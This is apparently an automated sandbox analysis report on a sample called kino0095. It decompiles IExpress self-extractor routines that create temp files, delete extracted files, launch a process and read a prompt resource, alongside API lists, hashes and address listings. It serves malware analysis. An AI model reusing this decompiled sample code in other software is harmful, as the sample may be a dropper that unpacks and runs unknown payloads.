                                                                                                                                                                                                                                    0x010b6b7d
                                                                                                                                                                                                                                    0x010b6b81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6b83
                                                                                                                                                                                                                                    0x010b6b8c
                                                                                                                                                                                                                                    0x010b6b8d
                                                                                                                                                                                                                                    0x010b6b90
                                                                                                                                                                                                                                    0x010b6b90
                                                                                                                                                                                                                                    0x010b6b83
                                                                                                                                                                                                                                    0x010b6b81
                                                                                                                                                                                                                                    0x010b6b94
                                                                                                                                                                                                                                    0x010b6b98
                                                                                                                                                                                                                                    0x010b6ba2
                                                                                                                                                                                                                                    0x010b6b9a
                                                                                                                                                                                                                                    0x010b6b9a
                                                                                                                                                                                                                                    0x010b6b9a
                                                                                                                                                                                                                                    0x010b6ba3
                                                                                                                                                                                                                                    0x010b6bab
                                                                                                                                                                                                                                    0x010b6bb0
                                                                                                                                                                                                                                    0x010b6bb5
                                                                                                                                                                                                                                    0x010b6bbc
                                                                                                                                                                                                                                    0x010b6bbf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6bbf
                                                                                                                                                                                                                                    0x010b6c1e
                                                                                                                                                                                                                                    0x010b6c25
                                                                                                                                                                                                                                    0x010b6c27
                                                                                                                                                                                                                                    0x010b6c2d
                                                                                                                                                                                                                                    0x010b6c2d
                                                                                                                                                                                                                                    0x010b6c32
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6bc5
                                                                                                                                                                                                                                    0x010b6bc5
                                                                                                                                                                                                                                    0x010b6bc8
                                                                                                                                                                                                                                    0x010b6bcc
                                                                                                                                                                                                                                    0x010b6bce
                                                                                                                                                                                                                                    0x010b6bce
                                                                                                                                                                                                                                    0x010b6bd1
                                                                                                                                                                                                                                    0x010b6bd3
                                                                                                                                                                                                                                    0x010b6bd3
                                                                                                                                                                                                                                    0x010b6bd6
                                                                                                                                                                                                                                    0x010b6bda
                                                                                                                                                                                                                                    0x010b6be1
                                                                                                                                                                                                                                    0x010b6be3
                                                                                                                                                                                                                                    0x010b6be5
                                                                                                                                                                                                                                    0x010b6be5
                                                                                                                                                                                                                                    0x010b6be6
                                                                                                                                                                                                                                    0x010b6be6
                                                                                                                                                                                                                                    0x010b6be9
                                                                                                                                                                                                                                    0x010b6bea
                                                                                                                                                                                                                                    0x010b6bea
                                                                                                                                                                                                                                    0x010b6b74
                                                                                                                                                                                                                                    0x010b6c39
                                                                                                                                                                                                                                    0x010b6c3e
                                                                                                                                                                                                                                    0x010b6c3e
                                                                                                                                                                                                                                    0x010b6abe
                                                                                                                                                                                                                                    0x010b6abe
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010B7182
                                                                                                                                                                                                                                      • Part of subcall function 010B7155: GetCurrentProcessId.KERNEL32 ref: 010B7191
                                                                                                                                                                                                                                      • Part of subcall function 010B7155: GetCurrentThreadId.KERNEL32 ref: 010B719A
                                                                                                                                                                                                                                      • Part of subcall function 010B7155: GetTickCount.KERNEL32 ref: 010B71A3
                                                                                                                                                                                                                                      • Part of subcall function 010B7155: QueryPerformanceCounter.KERNEL32(?), ref: 010B71B8
                                                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,010B72B8,00000058), ref: 010B6A7F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 010B6AB4
                                                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 010B6AC9
                                                                                                                                                                                                                                    • _initterm.MSVCRT ref: 010B6B1D
                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 010B6B49
                                                                                                                                                                                                                                    • exit.KERNELBASE ref: 010B6BBF
                                                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 010B6BDA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                                                    • Opcode ID: 79a85bb50ab84ffec8b7a6a66cd8c5b2d3b7606538f87db974983aae7ab76497
                                                                                                                                                                                                                                    • Instruction ID: 3f1d534246fbca8308b93a8b65bf56c878a1f4a746fd4867f778cdb1a9420aa2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79a85bb50ab84ffec8b7a6a66cd8c5b2d3b7606538f87db974983aae7ab76497
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841E531A04325DBEB719B6DE8D4BEE7BF8FB44710F14805AE9C197294CB7B48808B80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 631 10b58c8-10b58d5 632 10b58d8-10b58dd 631->632 632->632 633 10b58df-10b58f1 LocalAlloc 632->633 634 10b5919-10b5959 call 10b1680 call 10b658a CreateFileA LocalFree 633->634 635 10b58f3-10b5901 call 10b44b9 633->635 639 10b5906-10b5910 call 10b6285 634->639 644 10b595b-10b596c CloseHandle GetFileAttributesA 634->644 635->639 645 10b5912-10b5918 639->645 644->639 646 10b596e-10b5970 644->646 646->639 647 10b5972-10b597b 646->647 647->645
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E010B58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E010B1680(_t20, _t36, _t33);
					E010B658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x10b9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x10b9124 = E010B6285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                    0x010b58cd
                                                                                                                                                                                                                                    0x010b58d1
                                                                                                                                                                                                                                    0x010b58d3
                                                                                                                                                                                                                                    0x010b58d5
                                                                                                                                                                                                                                    0x010b58d8
                                                                                                                                                                                                                                    0x010b58d8
                                                                                                                                                                                                                                    0x010b58da
                                                                                                                                                                                                                                    0x010b58db
                                                                                                                                                                                                                                    0x010b58e1
                                                                                                                                                                                                                                    0x010b58ed
                                                                                                                                                                                                                                    0x010b58f1
                                                                                                                                                                                                                                    0x010b591e
                                                                                                                                                                                                                                    0x010b592c
                                                                                                                                                                                                                                    0x010b5943
                                                                                                                                                                                                                                    0x010b594a
                                                                                                                                                                                                                                    0x010b594d
                                                                                                                                                                                                                                    0x010b5953
                                                                                                                                                                                                                                    0x010b5959
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b595b
                                                                                                                                                                                                                                    0x010b595c
                                                                                                                                                                                                                                    0x010b5963
                                                                                                                                                                                                                                    0x010b596c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5972
                                                                                                                                                                                                                                    0x010b5974
                                                                                                                                                                                                                                    0x010b597a
                                                                                                                                                                                                                                    0x010b597a
                                                                                                                                                                                                                                    0x010b596c
                                                                                                                                                                                                                                    0x010b58f3
                                                                                                                                                                                                                                    0x010b5901
                                                                                                                                                                                                                                    0x010b5906
                                                                                                                                                                                                                                    0x010b590b
                                                                                                                                                                                                                                    0x010b5910
                                                                                                                                                                                                                                    0x010b5910
                                                                                                                                                                                                                                    0x010b5918

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B58E7
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5943
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B594D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B595C
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,010B5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010B5963
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                    • API String ID: 747627703-2825630923
                                                                                                                                                                                                                                    • Opcode ID: c211aeb82b27c28c7e5b5b84b94f2893cbb0c505a2ef6e05e5c8b324b4c9e80a
                                                                                                                                                                                                                                    • Instruction ID: 5aba796a06a6c42249370a3dc3413028e52eb9ea2e7007fe37b6071649e93dc5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c211aeb82b27c28c7e5b5b84b94f2893cbb0c505a2ef6e05e5c8b324b4c9e80a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F1100717002117AD7701B7AACCCADB7E99DF86260B100A99B68AE31C4DA79980687A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B52B6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 648 10b52b6-10b52d4 649 10b5317-10b531f 648->649 650 10b52d6 648->650 652 10b5379-10b5381 649->652 653 10b5321-10b5328 649->653 651 10b52d7-10b52e0 650->651 654 10b52e2-10b52e9 651->654 655 10b5300-10b5314 LocalFree * 2 651->655 656 10b538c-10b53a0 call 10b6ce0 652->656 657 10b5383-10b5385 652->657 653->652 658 10b532a-10b5331 653->658 654->655 659 10b52eb-10b52fa SetFileAttributesA DeleteFileA 654->659 655->651 661 10b5316 655->661 657->656 660 10b5387 call 10b1fe1 657->660 658->652 663 10b5333-10b5351 call 10b1781 658->663 659->655 660->656 661->649 668 10b535e-10b536f SetCurrentDirectoryA call 10b2390 663->668 669 10b5353-10b5359 call 10b65e8 663->669 672 10b5374 668->672 669->668 672->652
                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E010B52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x10b8004; // 0x72151d89
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x10b91e0; // 0xef7a50
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x10b8a24 == 0 &&  *0x10b9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x10b8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x10b8a24 == 0 &&  *0x10b9a30 == 0) {
					_push(_t22);
					E010B1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x10b9a34 & 0x00000020) != 0) {
						E010B65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E010B2390( &_v268);
					_t11 =  *0x10b8a20; // 0x0
				}
				if( *0x10b9a40 != 1 && _t11 != 0) {
					_t11 = E010B1FE1(_t22); // executed
				}
				 *0x10b8a20 =  *0x10b8a20 & 0x00000000;
				return E010B6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                    0x010b52b6
                                                                                                                                                                                                                                    0x010b52b6
                                                                                                                                                                                                                                    0x010b52b6
                                                                                                                                                                                                                                    0x010b52c1
                                                                                                                                                                                                                                    0x010b52c8
                                                                                                                                                                                                                                    0x010b52cb
                                                                                                                                                                                                                                    0x010b52cc
                                                                                                                                                                                                                                    0x010b52d4
                                                                                                                                                                                                                                    0x010b52d6
                                                                                                                                                                                                                                    0x010b52d7
                                                                                                                                                                                                                                    0x010b52de
                                                                                                                                                                                                                                    0x010b52e0
                                                                                                                                                                                                                                    0x010b52f2
                                                                                                                                                                                                                                    0x010b52fa
                                                                                                                                                                                                                                    0x010b52fa
                                                                                                                                                                                                                                    0x010b5302
                                                                                                                                                                                                                                    0x010b5305
                                                                                                                                                                                                                                    0x010b530c
                                                                                                                                                                                                                                    0x010b5312
                                                                                                                                                                                                                                    0x010b5316
                                                                                                                                                                                                                                    0x010b5316
                                                                                                                                                                                                                                    0x010b5317
                                                                                                                                                                                                                                    0x010b531c
                                                                                                                                                                                                                                    0x010b531f
                                                                                                                                                                                                                                    0x010b5333
                                                                                                                                                                                                                                    0x010b5345
                                                                                                                                                                                                                                    0x010b5351
                                                                                                                                                                                                                                    0x010b5359
                                                                                                                                                                                                                                    0x010b5359
                                                                                                                                                                                                                                    0x010b5363
                                                                                                                                                                                                                                    0x010b5369
                                                                                                                                                                                                                                    0x010b536f
                                                                                                                                                                                                                                    0x010b5374
                                                                                                                                                                                                                                    0x010b5374
                                                                                                                                                                                                                                    0x010b5381
                                                                                                                                                                                                                                    0x010b5387
                                                                                                                                                                                                                                    0x010b5387
                                                                                                                                                                                                                                    0x010b538f
                                                                                                                                                                                                                                    0x010b53a0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(00EF7A50,00000080,?,00000000), ref: 010B52F2
                                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(00EF7A50), ref: 010B52FA
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00EF7A50,?,00000000), ref: 010B5305
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00EF7A50), ref: 010B530C
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(010B11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B5363
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Pz, xrefs: 010B52CC
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010B5334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Pz
                                                                                                                                                                                                                                    • API String ID: 2833751637-2830093337
                                                                                                                                                                                                                                    • Opcode ID: c477356b2ebf758092a6e272af81fed65484109e04e330839048e8f0ad363d15
                                                                                                                                                                                                                                    • Instruction ID: efb5ccc72fa88908ad4efd5c3396f7f06596a067ed63f44e027a696bf206a1fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c477356b2ebf758092a6e272af81fed65484109e04e330839048e8f0ad363d15
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121A431512204DBEB719F14ECD8BE977F8FB14B14F0481D9E9C267298CBBA5984CB80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B3FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                    			E010B3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x10b8004; // 0x72151d89
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E010B6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x10b9124 = E010B6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E010B44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x10b8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x10b9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x10b9a2c = _t44;
						}
					}
				}
				E010B411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x10b9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                    0x010b3fef
                                                                                                                                                                                                                                    0x010b3ffa
                                                                                                                                                                                                                                    0x010b4001
                                                                                                                                                                                                                                    0x010b4008
                                                                                                                                                                                                                                    0x010b400a
                                                                                                                                                                                                                                    0x010b400b
                                                                                                                                                                                                                                    0x010b4010
                                                                                                                                                                                                                                    0x010b410a
                                                                                                                                                                                                                                    0x010b411a
                                                                                                                                                                                                                                    0x010b411a
                                                                                                                                                                                                                                    0x010b401c
                                                                                                                                                                                                                                    0x010b401d
                                                                                                                                                                                                                                    0x010b401e
                                                                                                                                                                                                                                    0x010b401f
                                                                                                                                                                                                                                    0x010b4033
                                                                                                                                                                                                                                    0x010b403b
                                                                                                                                                                                                                                    0x010b40ca
                                                                                                                                                                                                                                    0x010b40e9
                                                                                                                                                                                                                                    0x010b40f8
                                                                                                                                                                                                                                    0x010b4101
                                                                                                                                                                                                                                    0x010b4106
                                                                                                                                                                                                                                    0x010b4106
                                                                                                                                                                                                                                    0x010b4108
                                                                                                                                                                                                                                    0x010b4108
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4108
                                                                                                                                                                                                                                    0x010b4049
                                                                                                                                                                                                                                    0x010b405c
                                                                                                                                                                                                                                    0x010b4062
                                                                                                                                                                                                                                    0x010b4068
                                                                                                                                                                                                                                    0x010b406e
                                                                                                                                                                                                                                    0x010b4070
                                                                                                                                                                                                                                    0x010b4077
                                                                                                                                                                                                                                    0x010b407f
                                                                                                                                                                                                                                    0x010b4089
                                                                                                                                                                                                                                    0x010b408b
                                                                                                                                                                                                                                    0x010b408b
                                                                                                                                                                                                                                    0x010b4089
                                                                                                                                                                                                                                    0x010b4077
                                                                                                                                                                                                                                    0x010b4091
                                                                                                                                                                                                                                    0x010b409c
                                                                                                                                                                                                                                    0x010b40a8
                                                                                                                                                                                                                                    0x010b40b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b40c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b40c2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010B4033
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010B4049
                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 010B405C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 010B409C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 010B40A8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010B40DC
                                                                                                                                                                                                                                    • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 010B40E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                                                    • Opcode ID: dafaf848afa4269ca7d77ed1a962dc4e35e62e44a3f36ab824246d26e5b0c384
                                                                                                                                                                                                                                    • Instruction ID: ce1e7d0984c003839127b5cbe97802cde288bc59c6a95bb641da7422409e0759
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dafaf848afa4269ca7d77ed1a962dc4e35e62e44a3f36ab824246d26e5b0c384
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9531B171750218ABEB709B69DCC8FEB77BCEB94700F1045A9F686E2152C63A4A81CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E010B468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E010B468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E010B44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x10b9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x10b9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x10b9124 = 0x80070714;
					goto L10;
				}
				E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x10b9124 = E010B6285();
				goto L10;
			}






                                                                                                                                                                                                                                    0x010b51fb
                                                                                                                                                                                                                                    0x010b5207
                                                                                                                                                                                                                                    0x010b520b
                                                                                                                                                                                                                                    0x010b523c
                                                                                                                                                                                                                                    0x010b5268
                                                                                                                                                                                                                                    0x010b5270
                                                                                                                                                                                                                                    0x010b528b
                                                                                                                                                                                                                                    0x010b5293
                                                                                                                                                                                                                                    0x010b529c
                                                                                                                                                                                                                                    0x010b52a6
                                                                                                                                                                                                                                    0x010b52b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b52b0
                                                                                                                                                                                                                                    0x010b529e
                                                                                                                                                                                                                                    0x010b5279
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b527b
                                                                                                                                                                                                                                    0x010b5273
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5273
                                                                                                                                                                                                                                    0x010b524a
                                                                                                                                                                                                                                    0x010b5250
                                                                                                                                                                                                                                    0x010b5256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5256
                                                                                                                                                                                                                                    0x010b5219
                                                                                                                                                                                                                                    0x010b5223
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
